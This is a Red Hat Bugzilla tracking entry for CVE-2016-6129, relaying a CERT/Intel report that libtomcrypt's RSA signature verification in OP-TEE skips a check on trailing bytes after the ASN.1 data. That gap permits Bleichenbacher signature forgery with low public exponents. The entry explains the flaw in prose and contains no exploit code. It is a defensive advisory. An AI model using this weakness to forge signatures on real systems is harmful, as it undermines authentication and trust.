Bug 1370955 (CVE-2016-6129) - CVE-2016-6129 libtomcrypt: possible OP-TEE Bleichenbacher attack
Summary: CVE-2016-6129 libtomcrypt: possible OP-TEE Bleichenbacher attack
Keywords:
Status: CLOSED NOTABUG
Alias: CVE-2016-6129
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=moderate,public=20160826,repor...
Depends On: 1370956 1370957 1471002
Blocks: 1460222
TreeView+ depends on / blocked
 
Reported: 2016-08-28 23:50 UTC by Jeremy Choi
Modified: 2019-06-08 21:24 UTC (History)
9 users (show)

Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
Clone Of:
Environment:
Last Closed: 2019-06-08 02:57:56 UTC


Attachments (Terms of Use)

Description Jeremy Choi 2016-08-28 23:50:24 UTC
It has been reported that libtomcrypt may be vulnerable to a Bleichenbacher attack due to a vulnerability in rsa_verify_hash.c

CERT has provided the details from Intel Security Advanced Threat Research team.
 
----------------------------------------------------------------------
Bleichenbacher signature forgery attack in OP-TEE
 
    Background
 
    The implementation for RSA signature verification of PKCS 1 v1.5 in the Open Portable Trusted Execution Environment (https://github.com/OP-TEE/optee_os) appears to be vulnerable to a Bleichenbacher signature forgery attack. The vulnerability may result in RSA signature or public certificate forgery when a low public exponent (for example, e = 3) is used.
 
 
 
    Vulnerability
 
    The function rsa_verify_hash_ex (https://github.com/OPTEE/optee_os/blob/master/core/lib/libtomcrypt/src/pk/rsa/rsa_verify_hash.c) does not check the number of remaining bytes in the decrypted message after ASN.1 encoded data.
 
The function decodes the ASN.1 message and checks that it has the correct structure and values (OID and hash). This permits additional data after the ASN.1 message that can be used to forge a PKCS1 v1.5 signature for keys with a low public exponent. The original variant of the attack is described here: https://www.ietf.org/mail-archive/web/openpgp/current/msg00999.html

----------------------------------------------------------------------

Comment 1 Jeremy Choi 2016-08-28 23:51:15 UTC
Created libtomcrypt tracking bugs for this issue:

Affects: fedora-all [bug 1370956]
Affects: epel-all [bug 1370957]

Comment 3 Borja Tarraso 2017-07-04 14:39:22 UTC
Acknowledgments:

Name: Borja Tarraso (Red Hat)

Comment 4 Borja Tarraso 2017-07-14 09:00:00 UTC
RHEV should take the pkgs from the base OS - but double checking with PM to be sure before marking this as fixed.


Note You need to log in before you can comment on or make changes to this bug.